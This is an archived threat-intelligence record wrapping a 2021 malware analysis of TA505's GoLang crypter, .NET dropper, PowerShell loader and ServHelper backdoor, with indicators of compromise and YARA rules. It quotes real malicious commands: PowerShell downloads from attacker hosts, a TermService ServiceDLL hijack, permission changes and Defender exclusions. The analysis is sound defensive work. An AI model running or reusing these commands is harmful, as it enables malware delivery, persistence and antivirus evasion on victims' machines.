{ "id": "401da398-505a-43fc-bf71-bea21d08d76d", "created_at": "2026-04-06T00:14:03.23717Z", "updated_at": "2026-04-10T03:36:37.028707Z", "deleted_at": null, "sha1_hash": "b07a7b16aba2cd0c504064f5de5b3be4916fbb76", "title": "TA505 adds GoLang crypter for delivering miners and ServHelper", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1262520, "plain_text": "TA505 adds GoLang crypter for delivering miners and ServHelper\r\nBy Jason Reaves\r\nPublished: 2021-07-06 · Archived: 2026-04-05 21:59:44 UTC\r\n6 min read\r\nJul 6, 2021\r\nBy: Jason Reaves and Joshua Platt\r\nPress enter or click to view image in full size\r\nRecently we discovered a campaign that has been detailed by a number of other groups[1,2,4] that is being\r\nleveraged for delivering malware that is associated with TA505, namely ServHelper[3] with recent campaigns. In\r\nan article by Avira[4] they linked older campaigns utilizing NSIS loaders but more recently campaigns have\r\nevolved to also leverage GoLang crypters wrapped around .NET loaders to start the chain.\r\nCrypter\r\nThe crypter layer is written in GoLang and is designed to obfuscate the next layer, it appears to be BASE64 but\r\nhas other characters in it.\r\nhttps://medium.com/walmartglobaltech/ta505-adds-golang-crypter-for-delivering-miners-and-servhelper-af70b26a6e56\r\nPage 1 of 10\n\nSome of the other function parameters would lead me to believe it is replacing characters in the string.\r\nWe can do a quick check by seeing if ‘A’ exists in the string at all:\r\nAnother file with the same crypter leverages replacing two bytes instead of one:\r\nhttps://medium.com/walmartglobaltech/ta505-adds-golang-crypter-for-delivering-miners-and-servhelper-af70b26a6e56\r\nPage 2 of 10\n\nAfter decoding this layer we are left with a .NET executable that is named ‘Dropper 1.0.0’ and has some\r\ninteresting resources.\r\nExecution starts in the programs Main component:\r\nPress enter or click to view image in full size\r\nWhich then runs ‘Form1’:\r\nhttps://medium.com/walmartglobaltech/ta505-adds-golang-crypter-for-delivering-miners-and-servhelper-af70b26a6e56\r\nPage 3 of 10\n\nWithin the ‘InitializeComponent’ function we can see ‘Form1_Load’ being set as the EventHandler which is\r\nactually responsible for detonating the powershell script resources.\r\nPress enter or click to view image in full size\r\nThe script ‘ready.ps1’ sets up a class for a few functions and detonates the ‘get-content.ps1’ script which handles\r\ninstalling and setting up a number of executable files along with a backdoor and persistence. It also can pull in\r\nother files for detonating:\r\n$g=New-Object -ComObject Msxml2.XMLHTTP;$g.open('GET',\"hxxp://88[.]119.171.253/dropper.ps1\",$false);$\r\nThis dropper powershell script contains many layers of obfuscation but eventually leads to a script that will install\r\nmultiple miner bots for Bitcoin and Eth.\r\nhttps://medium.com/walmartglobaltech/ta505-adds-golang-crypter-for-delivering-miners-and-servhelper-af70b26a6e56\r\nPage 4 of 10\n\n$payloadurl=\"http://beautyiconltd.cn/ethged.txt\"\r\n$configurl=\"http://beautyiconltd.cn/ethcnf.txt\"\r\n$hash=(New-Object Net.Webclient).downloadstring(\"http://beautyiconltd.cn/ethhsh.txt\")\r\nPowerShell Loader\r\nThe previous Get-Content powershell file is very similar in structure to the one listed in this blog post[1]. The\r\npowershell file writes multiple files to disk related to an RDP service, including a registry blob for setting up the\r\nservice:\r\nWindows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\TermService\r\n\"DependOnService\"=hex(7):52,00,50,00,43,00,53,00,53,00,00,00,00,00\r\n\"Description\"=\"@%SystemRoot%\\\\System32\\\\termsrv.dll,-267\"\r\n\"DisplayName\"=\"@%SystemRoot%\\\\System32\\\\termsrv.dll,-268\"\r\n\"ErrorControl\"=dword:00000001\r\n\"FailureActions\"=hex:80,51,01,00,00,00,00,00,00,00,00,00,03,00,00,00,14,00,00,\\\r\n 00,01,00,00,00,60,ea,00,00,01,00,00,00,60,ea,00,00,00,00,00,00,60,ea,00,00\r\n\"ImagePath\"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\\\r\n 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,\\\r\n 00,76,00,63,00,68,00,6f,00,73,00,74,00,2e,00,65,00,78,00,65,00,20,00,2d,00,\\\r\n 6b,00,20,00,4e,00,65,00,74,00,77,00,6f,00,72,00,6b,00,53,00,65,00,72,00,76,\\\r\n 00,69,00,63,00,65,00,00,00\r\n\"ObjectName\"=\"NT Authority\\\\NetworkService\"\r\n\"RequiredPrivileges\"=hex(7):53,00,65,00,41,00,73,00,73,00,69,00,67,00,6e,00,50,\\\r\n 00,72,00,69,00,6d,00,61,00,72,00,79,00,54,00,6f,00,6b,00,65,00,6e,00,50,00,\\\r\n 72,00,69,00,76,00,69,00,6c,00,65,00,67,00,65,00,00,00,53,00,65,00,41,00,75,\\\r\n 00,64,00,69,00,74,00,50,00,72,00,69,00,76,00,69,00,6c,00,65,00,67,00,65,00,\\\r\n 00,00,53,00,65,00,43,00,68,00,61,00,6e,00,67,00,65,00,4e,00,6f,00,74,00,69,\\\r\n 00,66,00,79,00,50,00,72,00,69,00,76,00,69,00,6c,00,65,00,67,00,65,00,00,00,\\\r\n 53,00,65,00,43,00,72,00,65,00,61,00,74,00,65,00,47,00,6c,00,6f,00,62,00,61,\\\r\n 00,6c,00,50,00,72,00,69,00,76,00,69,00,6c,00,65,00,67,00,65,00,00,00,53,00,\\\r\n 65,00,49,00,6d,00,70,00,65,00,72,00,73,00,6f,00,6e,00,61,00,74,00,65,00,50,\\\r\n 00,72,00,69,00,76,00,69,00,6c,00,65,00,67,00,65,00,00,00,53,00,65,00,49,00,\\\r\n 6e,00,63,00,72,00,65,00,61,00,73,00,65,00,51,00,75,00,6f,00,74,00,61,00,50,\\\r\n 00,72,00,69,00,76,00,69,00,6c,00,65,00,67,00,65,00,00,00,00,00\r\n\"ServiceSidType\"=dword:00000001\r\n\"Start\"=dword:00000003\r\n\"Type\"=dword:00000020[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters]\r\n\"ServiceDll\"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,\\\r\n 00,74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,\\\r\n 74,00,65,00,72,00,6d,00,73,00,72,00,76,00,2e,00,64,00,6c,00,6c,00,00,00\r\n\"ServiceDllUnloadOnStop\"=dword:00000001[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\TermServ\r\n\"Close\"=\"CloseTSObject\"\r\n\"Collect\"=\"CollectTSObjectData\"\r\n\"Collect Timeout\"=dword:000003e8\r\nhttps://medium.com/walmartglobaltech/ta505-adds-golang-crypter-for-delivering-miners-and-servhelper-af70b26a6e56\r\nPage 5 of 10\n\n\"Library\"=\"C:\\\\Windows\\\\System32\\\\perfts.dll\"\r\n\"Open\"=\"OpenTSObject\"\r\n\"Open Timeout\"=dword:000003e8\r\n\"InstallType\"=dword:00000001\r\n\"PerfIniFile\"=\"tslabels.ini\"\r\n\"First Counter\"=dword:0000238c\r\n\"Last Counter\"=dword:0000238c\r\n\"First Help\"=dword:0000238d\r\n\"Last Help\"=dword:0000238d\r\n\"Object List\"=\"9100\"\r\nThe listed ServiceDll for this registry blob is:\r\n%SystemRoot%\\\\System32\\\\termsrv.dll\\x00\r\nHowever after installing this new service it is stopped and so this appears to be designed for simply setting up a\r\nplaceholder service:\r\n}\r\nwrite-host kill\r\nset-service TermService -StartupType Disabled\r\n$tspid=(get-wmiobject win32_service | where { $_.name -eq 'TermService'}).processID\r\nStop-Process -Id $tspid -Forceew-Service -Name \"termservice\" -BinaryPathName \"C:\\WINDOWS\\System32\\svc\r\n reg import $env:temp\\rpds.reg}\r\nwrite-host kill\r\nset-service TermService -StartupType Disabled\r\n$tspid=(get-wmiobject win32_service | where { $_.name -eq 'TermService'}).processID\r\nStop-Process -Id $tspid -Force\r\nMost of the files written to disk are related to needed files for RDPWrap but there are two files that do not appear\r\nto be related to RDPWrap which are also UPX packed. These files are written as hardcoded files to disk.\r\n$fldr=$env:systemroot+\"\\branding\\\"\r\n$bf=\"mediasvc.png\"\r\n$rf=\"mediasrv.png\"\r\n$cf=\"wupsvc.jpg\"\r\nOne of these files will be set as the new ServiceDLL value for the previously mentioned placeholder service:\r\nreg add \"HKLM\\system\\currentcontrolset\\services\\TermService\\parameters\" /v ServiceDLL /t REG_EXPAND_S\r\nPayloads\r\nhttps://medium.com/walmartglobaltech/ta505-adds-golang-crypter-for-delivering-miners-and-servhelper-af70b26a6e56\r\nPage 6 of 10\n\nThis file calls itself ‘Helper’ and it contains encoded strings:\r\nCreating a quick string decoder lets us quickly dump the strings and see that this file is designed for accessing the\r\nother two files one being a DLL and the other being the RDPWrap config while also gathering some information\r\nabout the system it is on.\r\nSLIn\r\nwupsvc.jpg\r\nwupsvc.jpg\r\ntermsrv.dll\r\nServiceMain\r\ntermsrv.dll\r\nMain\r\nslc.dll\r\nMain\r\nslc.dll\r\n%d.%d.%d.%d\r\nNew_Win8SLE\r\nNew_Win8SLE\r\nSLInitHook.x64A\r\nSLInitFunc.x64A\r\nasfjiau4hghas\r\nows\\branding\r\n\\mediasvc.png\r\n _\r\nvsdlskdngsj\r\nhttps://medium.com/walmartglobaltech/ta505-adds-golang-crypter-for-delivering-miners-and-servhelper-af70b26a6e56\r\nPage 7 of 10\n\nvsdlskdngsj\r\nSLGetWindowsInformationDWORD\r\nThe other DLL that was written to disk which was also UPX packed turns out to be the most interesting for us, this\r\nis the Tunnel variant of ServHelper[3] that was detailed in a blog post by BinaryDefense[2]. The blog post is\r\npretty comprehensive and lined up pretty well with what we saw in our samples, ServHelper related config data:\r\n{'C2': ['asdjausg.cn', 'potuybze.xyz', 'asfuuvhv3083f.xyz', 'http://bromide.xyz/ssh.zip', 'http://sds\r\nConclusion\r\nAn interesting full circle from finding a GoLang crypted .NET loader for dropping miner bots and also being used\r\nfor delivering ServHelper.\r\nIOCs\r\nGoLang Crypted files:\r\nb591e73c3ebfe7ba44eb161c3cc1ee7b9a794d4e9b9b9aa4e3936f518e814ceb\r\n6eca26fcfabbb12c6a37eb689de222e75b31574dd25e7fd3d8b446d700c40133\r\nServHelper configs:\r\n{'C2': ['hopeithelps.xyz', 'adsgjuhsdgubhu4.xyz', 'zbuurhbbc.cn', 'http://bromide.xyz/ssh.zip', 'http\r\nPowerShell loader secondaries:\r\nhttp://45.61.136.223/get/arch.php\r\nhttp://45.61.136.223/get/getter.php\r\nhttp://45.61.136.223/get/grep.php\r\nhttp://45.61.136.223/get/m5.php\r\nhttp://88.119.171.253/dropper.ps1\r\nEndpoint indicators:\r\nschtasks /run /tn \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I | Out-Nullreg add \"HKLM\\system\\cur\r\nicacls.exe rfxvmt.dll /setowner \"NT SERVICE\\TrustedInstaller\"\r\nicacls.exe rfxvmt.dll /grant \"NT SERVICE\\TrustedInstaller:F\"icacls.exe rfxvmt.dll /remove \"NT AUTHORI\r\nicacls.exe rfxvmt.dll /grant \"NT AUTHORITY\\SYSTEM:RX\"\r\n#\r\nicacls.exe rfxvmt.dll /remove \"BUILTIN\\Administrators\"\r\nicacls.exe rfxvmt.dll /grant \"BUILTIN\\Administrators:RX\"write-host inst\r\n$Job = Start-Job -ScriptBlock {Add-MpPreference -ExclusionPath \"C:\\windows\\branding\\*\"}\r\nhttps://medium.com/walmartglobaltech/ta505-adds-golang-crypter-for-delivering-miners-and-servhelper-af70b26a6e56\r\nPage 8 of 10\n\n$Job | Wait-Job -Timeout 15\r\n$Job | Stop-Job\r\n$Job =Start-Job -ScriptBlock {Add-MpPreference -ExclusionPath \"C:\\users\\wgautilacc\\desktop\\*\" -force}\r\n$Job | Wait-Job -Timeout 15\r\n$Job | Stop-Job\r\n$Job =Start-Job -ScriptBlock {Add-MpPreference -ExclusionPath \"C:\\users\\mirrors\\desktop\\*\"}\r\n$Job | Wait-Job -Timeout 15\r\n$Job | Stop-Job\r\n#Add-MpPreference -ExclusionPath \"C:\\windows\\branding\\*\"\r\n#Add-MpPreference -ExclusionPath \"C:\\users\\wgautilacc\\desktop\\*\" -force\r\n#Add-MpPreference -ExclusionPath \"C:\\users\\mirrors\\desktop\\*\"\r\nYARA:\r\nrule unpacked_servhelper\r\n{\r\n meta:\r\n author = \"Jason Reaves\"\r\n strings:\r\n $string_1 = {48 8d 15 ?? ?? 00 00 4c 8d 05 ?? ?? 00 00 41 b9 ?? ?? ?? 00 e8}\r\n $val = \"SELECT Name FROM Win32_Group where SID=\" wide\r\n condition:\r\n uint16(0) == 0x5A4D and all of them\r\n}rule unpacked_helper\r\n{\r\nmeta:\r\n author = \"Jason Reaves\"\r\n sample1 = \"620c009cd021b02d789a8a084e03a17a95b1606950d1db9dcbced29dadc0e1dc\"\r\n sample2 = \"0b53130e094f715b729af44cdfbcd7c81ed37d71528c31e2a03fd2d5c3adfe0e\"\r\nstrings:\r\n$a1 = \"Copyright (C) Helper 20\" wide\r\n$s_decode = {8b c2 48 8d 4c 24 ?? 48 03 c8 8d 42 ?? 30 01 ff c2 8b 44 24 ?? 3b d0 72 e7}\r\ncondition:\r\nall of them\r\n}\r\nReferences\r\n1:https://suid.ch/research/Telegram_Malware_Analysis.html\r\nGet Jason Reaves’s stories in your inbox\r\nJoin Medium for free to get updates from this writer.\r\nRemember me for faster sign in\r\nhttps://medium.com/walmartglobaltech/ta505-adds-golang-crypter-for-delivering-miners-and-servhelper-af70b26a6e56\r\nPage 9 of 10\n\n2:https://www.binarydefense.com/an-updated-servhelper-tunnel-variant/\r\n3:https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505\r\n4:https://www.avira.com/en/blog/ta505-apt-group-targets-americas\r\nSource: https://medium.com/walmartglobaltech/ta505-adds-golang-crypter-for-delivering-miners-and-servhelper-af70b26a6e56\r\nhttps://medium.com/walmartglobaltech/ta505-adds-golang-crypter-for-delivering-miners-and-servhelper-af70b26a6e56\r\nPage 10 of 10", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://medium.com/walmartglobaltech/ta505-adds-golang-crypter-for-delivering-miners-and-servhelper-af70b26a6e56" ], "report_names": [ "ta505-adds-golang-crypter-for-delivering-miners-and-servhelper-af70b26a6e56" ], "threat_actors": [ { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "5e6b31a6-80e3-4e7d-8b0a-d94897ce9b59", "created_at": "2024-06-19T02:03:08.128175Z", "updated_at": "2026-04-10T02:00:03.636663Z", "deleted_at": null, "main_name": "GOLD TAHOE", "aliases": [ "Cl0P Group Identity", "FIN11 ", "GRACEFUL SPIDER ", "SectorJ04 ", "Spandex Tempest ", "TA505 " ], "source_name": "Secureworks:GOLD TAHOE", "tools": [ "Clop", "Cobalt Strike", "FlawedAmmy", "Get2", "GraceWire", "Malichus", "SDBbot", "ServHelper", "TrueBot" ], "source_id": "Secureworks", "reports": null }, { "id": "75d4d6a9-b5d1-4087-a7a0-e4a9587c45f4", "created_at": "2022-10-25T15:50:23.5188Z", "updated_at": "2026-04-10T02:00:05.26565Z", "deleted_at": null, "main_name": "TA505", "aliases": [ "TA505", "Hive0065", "Spandex Tempest", "CHIMBORAZO" ], "source_name": "MITRE:TA505", "tools": [ "AdFind", "Azorult", "FlawedAmmyy", "Mimikatz", "Dridex", "TrickBot", "Get2", "FlawedGrace", "Cobalt Strike", "ServHelper", "Amadey", "SDBbot", "PowerSploit" ], "source_id": "MITRE", "reports": null }, { "id": "99cb4e5b-8071-4f9e-aa1d-45bfbb6197e3", "created_at": "2023-01-06T13:46:38.860754Z", "updated_at": "2026-04-10T02:00:03.125179Z", "deleted_at": null, "main_name": "TA505", "aliases": [ "SectorJ04", "SectorJ04 Group", "ATK103", "GRACEFUL SPIDER", "GOLD TAHOE", "Dudear", "G0092", "Hive0065", "CHIMBORAZO", "Spandex Tempest" ], "source_name": "MISPGALAXY:TA505", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e447d393-c259-46e2-9932-19be2ba67149", "created_at": "2022-10-25T16:07:24.28282Z", "updated_at": "2026-04-10T02:00:04.921616Z", "deleted_at": null, "main_name": "TA505", "aliases": [ "ATK 103", "Chimborazo", "G0092", "Gold Evergreen", "Gold Tahoe", "Graceful Spider", "Hive0065", "Operation Tovar", "Operation Trident Breach", "SectorJ04", "Spandex Tempest", "TA505", "TEMP.Warlock" ], "source_name": "ETDA:TA505", "tools": [ "Amadey", "AmmyyRAT", "AndroMut", "Azer", "Bart", "Bugat v5", "CryptFile2", "CryptoLocker", "CryptoMix", "CryptoShield", "Dridex", "Dudear", "EmailStealer", "FRIENDSPEAK", "Fake Globe", "Fareit", "FlawedAmmyy", "FlawedGrace", "FlowerPippi", "GOZ", "GameOver Zeus", "GazGolder", "Gelup", "Get2", "GetandGo", "GlobeImposter", "Gorhax", "GraceWire", "Gussdoor", "Jaff", "Kasidet", "Kegotip", "Kneber", "LOLBAS", "LOLBins", "Living off the Land", "Locky", "MINEBRIDGE", "MINEBRIDGE RAT", "MirrorBlast", "Neutrino Bot", "Neutrino Exploit Kit", "P2P Zeus", "Peer-to-Peer Zeus", "Philadelphia", "Philadephia Ransom", "Pony Loader", "Rakhni", "ReflectiveGnome", "Remote Manipulator System", "RockLoader", "RuRAT", "SDBbot", "ServHelper", "Shifu", "Siplog", "TeslaGun", "TiniMet", "TinyMet", "Trojan.Zbot", "Wsnpoem", "Zbot", "Zeta", "ZeuS", "Zeus" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434443, "ts_updated_at": 1775792197, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/b07a7b16aba2cd0c504064f5de5b3be4916fbb76.pdf", "text": "https://archive.orkl.eu/b07a7b16aba2cd0c504064f5de5b3be4916fbb76.txt", "img": "https://archive.orkl.eu/b07a7b16aba2cd0c504064f5de5b3be4916fbb76.jpg" } }